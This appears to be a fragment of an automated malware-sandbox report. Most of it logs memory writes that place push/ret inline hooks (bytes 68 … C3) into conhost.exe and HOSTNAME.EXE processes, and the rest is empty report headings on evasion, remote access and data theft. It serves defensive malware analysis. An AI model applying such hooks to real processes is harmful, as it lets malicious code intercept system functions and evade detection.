Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 76B88470 value: 68 87 16 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 76B53290 value: 68 E1 16 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 76B3B010 value: 68 0D 17 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 76873918 value: 68 DF BF 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 76876F01 value: 68 17 C0 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 76874406 value: 68 38 C0 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757A5C39 value: 68 4B 35 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757A476B value: 68 9B 35 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757B507D value: 68 B9 35 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757ABB1C value: 68 FF 35 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757D5BC1 value: 68 45 36 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757C71E4 value: 68 8B 36 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757D152B value: 68 D1 36 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757D25B7 value: 68 1A 37 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757D150A value: 68 63 37 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757D25DB value: 68 A9 37 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757B1B3C value: 68 EF 37 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757D2BD3 value: 68 38 38 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757AED4A value: 68 BD 38 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757ABC6A value: 68 0A 39 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757B0162 value: 68 57 39 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757A6293 value: 68 A9 39 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757B5D14 value: 68 FA F9 1A 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757B5D42 value: 68 6A FA 1A 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757B2D57 value: 68 AA FA 1A 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757B544C value: 68 05 FB 1A 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757B4AB7 value: 68 44 FB 1A 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757B5421 value: 68 83 FB 1A 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757AA575 value: 68 C3 FB 1A 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757D1C07 value: 68 56 FC 1A 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757D6703 value: 68 B4 7D 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757AA4B3 value: 68 E6 7D 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757EC1B0 value: 68 2D 7E 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757D6932 value: 68 6A 7E 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757D69F2 value: 68 C4 7E 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757A9DC7 value: 68 14 7F 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757BCDE8 value: 68 B3 7F 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757B1899 value: 68 DB 7F 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757B634A value: 68 03 80 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757B19A5 value: 68 2E 80 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757B64C7 value: 68 FF 81 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 757C2BA7 value: 68 AE 83 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 753326E6 value: 68 A7 C2 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 76887673 value: 68 80 BB 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 76874296 value: 68 F0 BB 1B 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 772D57B8 value: 68 26 B8 03 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 772F22AE value: 68 4B B9 03 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 7704BC9A value: 68 73 BB 03 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 7703318E value: 68 B4 BB 03 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 76762642 value: 68 1A BC 03 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 7672C532 value: 68 31 BC 03 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 7089441D value: 68 48 BC 03 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 70872EF2 value: 68 6F BC 03 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 76B38760 value: 68 6B 12 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 76B88740 value: 68 AF 12 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 76B3B4D0 value: 68 F3 12 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 76B82AF0 value: 68 48 13 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 76B73DB0 value: 68 9D 13 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 76BFC790 value: 68 3A 14 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 76B2B470 value: 68 D7 14 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 76BFC6D0 value: 68 22 15 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 76B33FA0 value: 68 6D 15 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 76B44FB0 value: 68 DA 15 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 76B60E10 value: 68 08 16 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 76B88470 value: 68 87 16 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 76B53290 value: 68 E1 16 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 76B3B010 value: 68 0D 17 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 76873918 value: 68 DF BF 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 76876F01 value: 68 17 C0 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 76874406 value: 68 38 C0 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 757A5C39 value: 68 4B 35 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 757A476B value: 68 9B 35 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 757B507D value: 68 B9 35 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 757ABB1C value: 68 FF 35 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 757D5BC1 value: 68 45 36 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 757C71E4 value: 68 8B 36 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 757D152B value: 68 D1 36 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 757D25B7 value: 68 1A 37 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 757D150A value: 68 63 37 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 757D25DB value: 68 A9 37 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 757B1B3C value: 68 EF 37 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 757D2BD3 value: 68 38 38 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 757AED4A value: 68 BD 38 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE	Memory written: PID: 2428 base: 757ABC6A value: 68 0A 39 04 00 C3
Source: C:\Windows\System32\HOSTNAME.EXE

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Loading ...

Warning!

Error!

Analysis Report

Overview

General Information

Detection

Analysis Advice

Signature Overview

Cryptography:

Protection of GUI:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Networking:

Boot Survival:

Remote Access Functionality:

Stealing of Sensitive Information:

Persistence and Installation Behavior:

Data Obfuscation:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection: